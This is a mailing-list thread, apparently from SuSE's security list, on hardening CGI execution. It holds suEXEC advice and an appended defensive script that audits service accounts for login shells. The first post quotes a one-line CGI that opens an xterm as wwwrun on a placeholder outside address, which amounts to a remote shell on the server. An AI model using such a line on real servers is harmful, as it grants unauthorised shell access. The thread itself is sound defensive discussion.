Hello,

When a user that has cgi-Access writes a cgi that looks like this:

--------------snip--------------
#!/bin/bash
#
xterm -display 123.45.67.89
--------------snap--------------

... (and inserts his own IP of course) he gets an xterm on his screen running as wwwrun.

So what can I do about this? One good thing would be chrooting the cgi-environment. How can this be done? Are there howtos or manuals about this?

Another thing is: Why is wwwrun having /bin/bash as shell and not /bin/false? What does it need a shell for?

Bye,
Gerhard

Hello Gerhard, hi all,

> So what can I do about this? One good thing would be chrooting the cgi-environment. How can this be done? Are there howtos or manuals about this?

See http://www.apache.org/docs/suexec.html

Note that SUexec is not installed by default, id est you have to re-compile Apache yourself.

Regards,
Tobias

Hi,

> Another thing is: Why is wwwrun having /bin/bash as shell and not /bin/false? What does it need a shell for?

There were some internal discussions about that issue. The result: We don't change non-human accounts' login shell to /bin/false, because it could result in some trouble with applications which need a login shell to successfully perform a 'su' etc.

Bye,
Thomas
--
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: thomas@suse.de    Function: Security Support & Auditing
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
Key fingerprint = 09 48 F2 FD 81 F7 E7 98 6D C7 36 F1 96 6A 12 47
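
Added example, not part of the original thread and not SuSE's own tooling: a small audit that lists non-human accounts which still have a usable login shell, so each one can be reviewed against the 'su' concern raised above. The UID cut-off of 500, the treatment of UID 65534 and the sample passwd entries are assumptions constructed for illustration.

```shell
#!/bin/sh
# Assumption: accounts with a UID below UID_MIN (root excepted) are service
# accounts; UID 65534 ("nobody") is treated as a service account as well.
UID_MIN="${UID_MIN:-500}"

# audit_shells FILE   (FILE may be "-" to read stdin)
# Prints "name:uid:shell" for every service account whose shell field
# would allow an interactive login.
audit_shells() {
    awk -F: -v min="$UID_MIN" '
        $1 ~ /^[#+-]/ || NF < 7      { next }  # comments, NIS entries, malformed lines
        $3 == 0                      { next }  # root is expected to have a shell
        $3 >= min && $3 != 65534     { next }  # human accounts
        $7 == "" { print $1 ":" $3 ":(empty, defaults to /bin/sh)"; next }
        $7 ~ /\/(false|nologin)$/    { next }  # already locked down
        { print $1 ":" $3 ":" $7 }
    ' "${1:--}"
}

# Constructed sample in passwd(5) format, not taken from a real system.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/bin/false
wwwrun:x:30:65534:Daemon user for apache:/tmp:/bin/bash
ftp:x:40:2:ftp account:/usr/local/ftp:
nobody:x:65534:65534:nobody:/tmp:/bin/bash
alice:x:500:100:constructed human account:/home/alice:/bin/bash
EOF
}

# Audit the file given as argument, or the constructed sample if none is given.
if [ $# -gt 0 ]; then
    audit_shells "$1"
else
    sample_passwd | audit_shells -
fi
```

The shell field only governs logins and 'su'; a CGI that starts with `#!/bin/bash` is executed by the web server as wwwrun whatever that field contains, so this audit complements suEXEC or a chroot rather than replacing them.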
Participants (3): Gerhard Pfeiffer, Thomas Biege, Tobias Burnus